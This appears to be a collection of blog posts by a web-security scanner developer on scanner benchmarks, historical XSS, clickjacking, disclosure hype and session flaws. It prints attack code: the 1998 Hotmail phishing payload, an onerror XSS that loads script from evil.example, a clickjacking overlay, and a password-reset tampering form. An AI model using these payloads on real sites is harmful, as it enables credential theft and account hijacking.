Observations on Larry Suto’s Paper about Web Application Security Scanners

Note: I’m the lead developer for the Web Application Scanning service at Qualys, and I worked at NTO for about three years from July 2003; both tools were included in this February 2010 report by Larry Suto. Nevertheless, I most humbly assure you that I am the world’s foremost authority on my opinion, however biased it may be.

The February 2010 report, Analyzing the Accuracy and Time Costs of Web Application Security Scanners, once again generated heated discussion about web application security scanners. (A similar report was previously published in October 2007.) The new report addressed some criticisms of the 2007 version and included more scanners and more transparent targets. The 2010 version, along with some strong reactions to it, engendered some additional questions on the topic of scanners in general:

How much should the ability of the user affect the accuracy of a scan?

Set aside basic requirements such as knowing what a link is or whether a site requires credentials before it can be scanned in a useful manner. Should a scan result be significantly more accurate or comprehensive for a user who has several years of web security experience than for someone who just picked up a book in order to have spare paper for origami practice?

I’ll quickly concede the importance of in-depth manual security testing of web applications as well as the fact that it cannot be replaced by automated scanning. (That is, in-depth manual testing can’t be replaced; unsophisticated tests or inexperienced testers are another matter.) Tools that aid the manual process have an important place, but how much disparity should there really be between “out of the box” and “well-tuned” scans? The difference should be as little as possible, with clear exceptions for complicated sequences, hidden links, or complex authentication schemes. Tools that require too much time to configure, maintain, and interpret don’t scale well for efforts that require scanning more than a handful of sites at a time. Tools whose accuracy correlates to the user’s web security knowledge scale at the rate of finding smart users, not at the rate of deploying software.

What’s a representative web application?

A default installation of osCommerce or Amazon? An old version of phpBB or the WoW forums? Web sites have wildly different coding styles, design patterns, underlying technologies, and levels of sophistication. A scanner that works well against a few dozen links might grind to a halt against a few thousand.

Accuracy against a few dozen hand-crafted links doesn’t necessarily scale against more complicated sites. Then there are web sites — in production and earning money no less — with bizarre and inefficient designs such as 60KB .NET VIEWSTATE fields or forms with seven dozen fields. A good test should include observations on a scanner’s performance at both ends of the spectrum.

Isn’t gaming a vendor-created web site redundant?

A post on the Acunetix blog accuses NTO of gaming the Acunetix test site based on a Referer field from web server log entries. First, there’s no indication that the particular scan cited was the one used in the comparison; the accusation has very flimsy support. Second, vendor-developed test sites are designed for the very purpose of showing off the web scanner. It’s a fair assumption that Acunetix created its test sites to highlight its scanner in the most positive manner possible, just as HP, IBM, Cenzic, and other scanner vendors would (or should) do for their own products. There’s nothing wrong with ensuring a scanner (the vendor’s or any other’s) performs most effectively against a web site offered for no other purpose than to show off the scanner’s capabilities.

This point really highlights one of the drawbacks of using vendor-oriented sites for comparison. Your web site probably doesn’t have the contrived HTML, forms, and vulnerabilities of a vendor-created intentionally-vulnerable site. Nor is it necessarily helpful that a scanner proves it can find vulnerabilities in a well-controlled scenario. Vendor sites help demonstrate the scanner, they provide a point of reference for discussing capabilities with potential customers, and they support marketing efforts. You probably care how the scanner fares against your site, not the vendor’s.

What about the time cost of scaling scans?

The report included a metric that attempted to demonstrate the investment of resources necessary to train a scanner. This is useful for users who need tools to aid in manual security testing or users who have only a few web sites to evaluate.

Yet what about environments where there are dozens, hundreds, or — yes, it’s possible — thousands of web sites to secure within an organization? The very requirement of training a scanner to deal with authentication or crawling works against running scans at a large scale. This is why point-and-shoot comparison should be a valid metric. (In opposition to at least one other opinion.)

Scaling scans doesn’t just require time to train a tool; it also requires hardware resources to manage configurations, run scans, and centralize reporting. This is a point where Software as a Service begins to seriously outpace other solutions.

Where’s the analysis of normalized data?

I mentioned previously that point-and-shoot should be one component of scanner comparison, but it shouldn’t be the only point — especially for tools intended to provide some degree of customization, whether it simply be authenticating to the web application or something more complex.

Data should be normalized not only within vulnerabilities (e.g. comparing reflected and persistent XSS separately, comparing error-based SQL injection separately from inference-based detections), but also within the type of scan. Results without authentication shouldn’t be compared to results with authentication. Another step would be to compare false positive/negative rates only for tests scanners actually perform rather than for checks a tool doesn’t perform. It’s important to note where a tool does or does not perform a check versus other scanners, but not performing a check reflects on accuracy differently than performing a check that still fails to identify a vulnerability.

What’s really going on here?

Designing a web application scanner is easy, implementing one is hard. Web security has complex problems, many of which have different levels of importance, relevance, and even nomenclature. The OWASP Top 10 project continues to refine its list by bringing more coherence to the difference between attacks, countermeasures, and vulnerabilities. The WASC-TC aims for a more comprehensive list defined by attacks and weaknesses. Contrasting the two approaches highlights different methodologies for testing web sites and evaluating their security.

So, if performing a comprehensive security review of a web site is already hard, then it’s likely to have a transitive effect on comparing scanners. Comparisons are useful: they provide a service to potential customers, who want to find the best scanner for their environment, and to vendors, who want to create the best scanner for any environment. The report demonstrates areas not only where scanners need to improve, but where evaluation methodologies need to improve. Over time both of these aspects should evolve in a positive direction.

Earliest(-ish) hack against web-based e-mail

The book starts off with a discussion of cross-site scripting (XSS) attacks along with examples from 2009 that illustrate the simplicity of these attacks and the significant impact they can have. What’s astonishing is how little many of the attacks have changed. Consider the following example, over a decade old, of HTML injection from before terms like XSS became so ubiquitous. The exploit appeared about two years before the blanket CERT advisory that called attention to the insecurity of unchecked HTML.

On August 24, 1998 a Canadian web developer, Tom Cervenka, posted a message to the comp.lang.javascript newsgroup that claimed:

We have just found a serious security hole in Microsoft’s Hotmail service (http://www.hotmail.com/) which allows malicious users to easily steal the passwords of Hotmail users. The exploit involves sending an e-mail message that contains embedded javascript code. When a Hotmail user views the message, the javascript code forces the user to re-login to Hotmail. In doing so, the victim’s username and password is sent to the malicious user by e-mail.

The discoverers, in apparent ignorance of the 1990s labeling requirements for hacks to include foul language or numeric characters, simply dubbed it the “Hot”Mail Exploit. (They demonstrated further lack of familiarity with disclosure methodologies by omitting greetz, avoiding typos, and failing to remind the reader of their near-omnipotent skills, surely an anomaly at the time. The hacker did not fail on all counts. He satisfied the Axiom of Hacking Culture by choosing a name, Blue Adept, that referenced pop culture, in this case the title of a fantasy novel by Piers Anthony.)

The attack required two steps. First, they set up a page on Geocities (a hosting service for web pages distinguished by being free before free was co-opted by the Web 2.0 fad) that spoofed Hotmail’s login.

The attack wasn’t particularly sophisticated, but it didn’t need to be. The login form collected the victim’s login name and password then mailed them, along with the victim’s IP address, to the newly-created Geocities account.

The second step involved executing the actual exploit against Hotmail by sending an e-mail with HTML that contained a rather curious img tag:

<img src="javascript:errurl='http://www.because-we-can.com/users/anon/hotmail/getmsg.htm';
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){top.submenu.document.links[i].target='work';
top.submenu.document.links[i].href=errurl;}noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){top.work.document.links[i].target='work';
top.work.document.links[i].href=errurl;}">

The JavaScript changed the browser’s DOM such that any click would take the victim to the spoofed login page, at which point the authentication credentials would be coaxed from the unwitting visitor. The original payload didn’t bother to obfuscate the JavaScript inside the src attribute. Modern attacks have more sophisticated obfuscation techniques and use tags other than the img element. The problem of HTML injection, although well known for over 10 years, remains a significant threat to web applications.
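
For contrast, here is a sketch of what a present-day payload more commonly looks like. The payload, host name, and script name are my own illustrative inventions, not taken from any particular attack: an event handler on a broken image pulls in an external script rather than relying on a javascript: URL in the src attribute.

<!-- Hypothetical example only: evil.example and payload.js are placeholders. -->
<!-- The bogus src forces the onerror handler to run, which then loads an
     attacker-controlled script into the page. -->
<img src="nosuchimage" onerror="var s=document.createElement('script');s.src='http://evil.example/payload.js';document.body.appendChild(s)">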

Factor of Ultimate Doom

Vulnerability disclosure presents a complex challenge to the information security community. A reductionist explanation of disclosure arguments need only present two claims. One end of the spectrum goes, “Only the vendor need know so no one else knows the problem exists, which means no one can exploit it.” The information-wants-to-be-free diametric opposition simply states, “Tell everyone as soon as the vulnerability is discovered”.

The Factor of Ultimate Doom (FUD) is a step towards reconciling this spectrum into a laser-focused compromise of agreement. It establishes a metric for evaluating the absolute danger inherent to a vulnerability, thus providing the discoverer with guidance on how to reveal the vulnerability.

The Factor is calculated by simple addition across three axes: Resources Expected, Protocol Affected, and Overall Impact. Vulnerabilities that do not meet any of the Factor’s criteria may be classified under the Statistically Irrelevant Concern metric, which will be explored at a later date.

Resources Expected
(3) Exploit doesn’t require shellcode; merely a JavaScript alert() call
(2) Exploit shellcode requires fewer than 12 bytes. In other words, it must be more efficient than the export PS1=# hack (to which many operating systems, including OS X, remain vulnerable)
(1) Exploit shellcode requires a GROSS sled. (A GROSS sled uses opcode 144 on Intel x86 processors, whereas the more well-known NOP sled uses opcode 0x90.)

Protocol Affected
(3) The Common Porn Interchange Protocol (TCP/IP)
(2) Multiple online rhetorical opinion networks
(1) Social networks

Overall Impact
(3) Control every computer on the planet
(2) Destroy every computer on the planet
(1) Destroy another planet (obviously, the Earth’s internet would not be affected — making this a minor concern)

The resulting value is measured against an Audience Rating to determine how the vulnerability should be disclosed. This provides a methodology for verifying that a vulnerability was responsibly disclosed.

Audience Rating (by Factor of Ultimate Doom*)
(> 6) Can only be revealed at a security conference
(< 6) Cannot be revealed at a security conference
(< 0) Doesn’t have to be revealed; it’s just that dangerous

(*Due to undisclosed software patent litigation, values equal to 6 are ignored.)

Yawnjacking

So, I was asked to comment about clickjacking today. Technically, it isn’t a new vulnerability (IE6 fixed a variant in 2004, Firefox fixed a variant in September 2008), but a refinement of previous exploits ennobled with a catchier name. It gained widespread coverage in October 2008 prior to the OWASP NYC conference when Jeremiah Grossman and Robert Hansen first said they would describe the vulnerability, then cancelled their talk for fear of unleashing Yet Another Exploit of Ultimate Doom.* The updated technique combines devious DOM manipulation with well-established attack patterns to make a respectable type of attack.

I still hope that this doesn’t make it into the OWASP Top 10. (I’ll explain why elsewhere.)

Anyway, in the interest of further polluting the internet with opinionated cruft, here’s more information about clickjacking:

Clickjacking tricks a user into clicking an element of an attacker-chosen page while the user sees only what appears to be an innocuous link. The attacker identifies an area in the target HTML that should receive the click event. This HTML is placed within an IFRAME such that the X and Y offsets of the frame place the target area in the upper left-hand corner of the frame’s visible area. This target IFRAME is visually hidden from the user (though the element remains part of the DOM). The IFRAME is then set within a second page (the content of which doesn’t matter) beneath the mouse cursor and, very importantly, dynamically moves so that it is always underneath the mouse. When the user clicks somewhere within the second page, the click is actually sent to the target area even though it appears to the user that the mouse is only above some innocuous link.

Essentially, an attacker chooses some web page that, if the victim clicked some point (link, button, etc.) on it, would produce some benefit to the attacker (e.g. generate click-fraud revenue, change a security setting, etc.). Next, the attacker takes the target page and places a second, innocuous page over it. The trick is to get the victim to make a mouse click on what appears to be the innocuous page, but is actually an invisible element of the target page that has been automatically, and invisibly, placed beneath the cursor.
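
A minimal sketch of that overlay technique follows. The target URL, element sizes, and pixel offsets are invented for illustration; a real attack would tune them to whichever button or link it wants clicked.

<!-- The bait the victim believes they are clicking. -->
<div style="position:absolute; top:20px; left:20px;">Click for a free prize</div>

<!-- A small, fully transparent window onto the framed target page. The negative
     offsets slide the framed page so that the element the attacker wants clicked
     sits exactly within this clipped region. -->
<div id="trap" style="position:absolute; width:80px; height:25px;
     overflow:hidden; opacity:0; z-index:10;">
  <iframe src="http://target.example/account/settings"
          style="position:relative; top:-210px; left:-145px;
                 width:800px; height:600px; border:0;"></iframe>
</div>

<script>
// Keep the invisible window glued to the cursor so that wherever the victim
// clicks, the click lands on the hidden element instead of the visible page.
document.addEventListener('mousemove', function (e) {
  var trap = document.getElementById('trap');
  trap.style.left = (e.pageX - 10) + 'px';
  trap.style.top  = (e.pageY - 10) + 'px';
}, false);
</script>

The mousemove handler is what makes the bait’s location irrelevant: any click, anywhere on the page, is delivered to the hidden element.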
The attack relies on luring a user to a server under the attacker’s control or a site that has been compromised by the attacker. Web site owners who ensure their site is free of cross-site scripting or other vulnerabilities can prevent their sites from being used as a relay point for the attacker. Yet other successful attacks, such as phishing, also rely on luring users to a server under the attacker’s control. The relative success of phishing implies that just securing web applications at the server isn’t the only solution because users can be tricked into visiting malicious web sites.

The core of the attack occurs in the browser, which is where the real fix needs to appear. The problem is that browsers are intended to handle HTML from many sources and provide mechanisms to manipulate the location and visibility of elements within a web page. Consequently, any solution would have to block this attack while not inhibiting legitimate uses of this functionality.
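
Until browsers provide such a control, the common stopgap has been for the target site itself to refuse to render inside another page. A typical frame-busting script looks something like the sketch below; it is only a partial mitigation (variations of this check can be and have been defeated), and it does nothing for sites that never add it.

<script>
// Frame-busting sketch: if this document is not the topmost frame, navigate
// the top window to this page so it cannot be buried under a decoy.
if (top !== self) {
  top.location = self.location;
}
</script>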
*Yes, I made you scroll all the way down here to get the link. How evil is that?

The Internet is dead! Long live the Internet!

In 1998, L0pht claimed before Congress that in under 30 minutes their seven-member group could make online porn and Trek fan sites unusable for several days. (That’s all that existed on the Internet in 1998.) In February 2002 an SNMP vulnerability threatened the very fabric of space and time (at least as it related to porn and Trek fan sites; if you still don’t believe me, consider that Google added Klingon language support the same month). More recently, a DNS vulnerability was (somewhat re-)discovered that could enable attackers to redirect traffic going to sites like google.com and wikipedia.com to sites that served porn, even though many people wouldn’t notice the difference. (Dan Kaminsky compiled a list of other apocalyptic vulnerabilities similar to the issues that plagued DNS.)

This year at the OWASP NYC AppSec 2008 Conference Jeremiah Grossman and Robert “RSnake” Hansen shared another vulnerability, clickjacking, in the Voldemort “He Who Must Not Be Named” style. In other words, yet another eschatonic vulnerability existed, but its details could not be shared. This disclosure method continued the trend from Black Hat 2008, prior to which the media and security discussion lists talked about the secretly-held, unsecretly-guessed DNS vulnerability with the speculation usually reserved for important things like when Gn’Fn’R would finally release Chinese Democracy. [If you don’t care about the gory details of the disclosure drama and just want to skim the abattoir, then read this summary.]

Yet none of these doom-laden vulnerabilities have caused the Internet to go pfft like a certain parrot that need not be named.

Until now.
I’ve discovered a trivially exploitable web-based vulnerability called the Cross-Hype Attack Forgery Exploit (CHAFE). It affects all web browsers and can’t be patched (nor will you be protected by Firefox’s NoScript or by using lynx). In fact, if you’re reading this entry then I guarantee you can be vulnerable to it. Public release of the details would be self-defeating, but I’m willing to sell the details to the highest bidder, as well as to anyone else who wants to pay for the information. To ensure the validity of this vulnerability, consider that it has both “cross” and “forgery” in the name. So, it clearly has a working exploit associated with it. No peer review is necessary to establish the vulnerability’s credibility. To build further confidence, I’ll hint that the vulnerability builds on prior research, but who really cares about dusty problems from 1991 when you can have a working exploit in 2008?

Since I haven’t gotten around to creating a PayPal account yet (although a reminder to update my account information just arrived in my InBox a few moments ago), send an e-mail to chafe@hackculture.com if you’re interested in the details and you have some money from which you’d like to be parted.

Good morning, Worm, Your Honor

[This was originally posted August 2003 on the now-defunct vulns.com site before the Samy worm and sophisticated XSS attacks appeared. In the five years since this was first posted, web applications still struggle with fixing XSS and SQL injection vulnerabilities. In fact, it’s still possible to discover web sites that put raw SQL statements in URL parameters.]

With the advent of the Windows RPC-based worm, security pros once again loudly lament the lack of patched servers, security-aware power users once again loudly blast Microsoft for (insert favorite negative adverb here) written code, and company parking lots at midnight still have a few sticker-laden cars of sysadmins fixing the problem. Of course, there are a few differences, such as the fact that Joe and Jane’s home computers have been caught red-handed showing vulnerable ports (unlike SQL Slammer or the IIS worm of the month, which targeted servers not usually found in home networks), but the usual suspects still linger.

In fact, we could diverge onto many different topics when talking about worms. For starters, what’s the point of arguing against full disclosure when worms arise weeks (SQL Slammer, our RPC friend) or months (Nimda and Code Red) AFTER the patch has been released? Obviously, that sidesteps many arguments against full disclosure, but it’s food for thought. What about the plethora of port scanners and one-time “freebie scanners” that security companies pump out to capitalize on the hysteria? Yes, there are administrators who don’t know what’s on their network, but I’m willing to bet there’s a larger number of administrators trying to figure out how to test, update, and manage a patch for 100, 1,000, or 5,000+ systems. You can’t release a patch and expect it to be applied to 1,000 servers within 24 hours. The tools to manage the patch process are too few, while the number of scanners is overwhelming. That’s not to say that security scanning isn’t necessary; it’s just a small part of the process. Administrators need help with patch testing, installation, and management.

Okay, so I’ve diverged onto a few topics already, but the one I wanted to highlight is this: what happens when a worm exploits a Web application vulnerability? Cgisecurity.com has a nice essay on one concept of such a worm. How easily could one spread? It may not be hard with a SQL injection and xp_cmdshell(). Who will be the scapegoat? It probably won’t involve cute references to “Billy Gates.” You can’t blame administrators for not being able to download a universal patch (although some ISAPI filters or Apache modules could prevent a lot of attacks). In the end, you have to return to the programmers. They must be aware that Web applications have vulnerabilities that don’t fall into the bloated category of “Buffer Overflow.”

Buffer overflows are sexy to report when they involve popular software. Plus, it’s nice to see a group doing security research for fun. Yet when a worm finally targets Web applications, nmap and vulnerability scanners along the lines of nikto or nessus probably won’t cut it when administrators want to check if their Web applications are vulnerable. Instead, they’ll want web application-aware tools to check live systems and code review tools to audit the source code. The proliferation of buffer overflows has led to some useful code review tools and compilers that can spot a minority of potential overflow vulnerabilities. OWASP is a good start. Hopefully, the tools to audit web applications and review source code will reach a point where the next worm won’t spread through e-commerce applications. Everyone talks about how much worse a buffer overflow-based worm could have been, but a worm that gathers passwords and collects credit card numbers from an e-commerce application has more implications for the average Internet user than a worm erasing a company’s hard drives.

So…so you think you can tell

[This was originally posted July 2003 on the now-defunct vulns.com site. Even several years later no web application scanner can automatically identify such vulnerabilities in a reliable, accurate manner — many vulnerabilities still require human analysis.]

Sit and listen to Pink Floyd’s album, Wish You Were Here. “Can you tell a green field from a cold steel rail?” Yes. Could you tell a buffer overflow from a valid username in a Web application? Yes again. What about SQL injection, cross-site scripting, directory traversal attacks, or appending “.bak” to every file? Once again, Yes. In fact, many of these attacks have common signatures that could be thrown into Snort or passed through a simple grep command when examining application log files. These are the vulnerabilities that are reported most often on sites like www.cgisecurity.com or www.securityfocus.com. And they pop up for good reason: they’re dangerous and quickly cripple an e-commerce application.

On the other hand, a different category of attacks has not yet crept far enough into the awareness of security administrators and application programmers: session attacks. There are several reasons for this relative obscurity. No automated tool does a proper job of identifying session vulnerabilities without customization to the application. There are no defined signatures to try, as opposed to the simpler single quote insertion for a SQL injection test. Most importantly, session state vulnerabilities vary significantly between applications.

The consequence of session attacks is no less severe than that of a good SQL injection that hits xp_cmdshell. Consider last May’s Passport advisory, in which an attacker could harvest passwords with tools no more sophisticated than a Web browser. The attack relied on selecting proper values for the “em” (victim’s e-mail) and “prefem” (attacker’s e-mail) parameters to the emailpwdreset.srf file. It should really be stressed that nowhere in this attack were invalid characters sent to the server. Both parameters were attacked, but the payload contained valid e-mail addresses – not e-mail addresses with single quotes, long strings, Unicode encoded characters, or other nefarious items.

The attack succeeded for two major reasons. First, the e-mail addresses were exposed to the client rather than tracked on the server in a session object. Second, the four steps ostensibly required for a user to complete the password reminder process did not have to be performed in sequential order, which demonstrates the lack of a strong state mechanism.
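
As a hypothetical sketch of the flawed pattern (the markup, request method, and field values below are my own illustration, not Passport’s actual page), the address that receives the reset information travels through the client as an ordinary parameter instead of living in a server-side session, so an attacker only has to change it:

<!-- Illustrative only: the field names em/prefem and the .srf target come from
     the advisory discussed above; everything else here is invented. -->
<form action="emailpwdreset.srf" method="GET">
  <input type="hidden" name="em" value="victim@hotmail.com">
  <!-- Swapping in the attacker's address redirects the reset information. -->
  <input type="hidden" name="prefem" value="attacker@example.com">
  <input type="submit" value="Reset password">
</form>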

It seems that most buffer overflow-style attacks against operating systems or Internet servers such as IIS or Apache have led to site defacements or denial of service attacks. Yet as e-commerce has grown with Web applications, so have the vulnerabilities moved on from buffer overflows. Plus, the attacks against Web applications no longer lead to site defacement, but to identity or financial theft (credit cards). Thus, vulnerabilities that used to affect only the server’s owners (and perhaps annoy users who can’t access the service for a period) now include Web application vulnerabilities that quite directly affect users.

As administrators and programmers, we need to be aware of all the vulnerabilities that crop up in Web applications – not just the easy (yet still important!) ones that currently populate the Web vulnerability encyclopedia.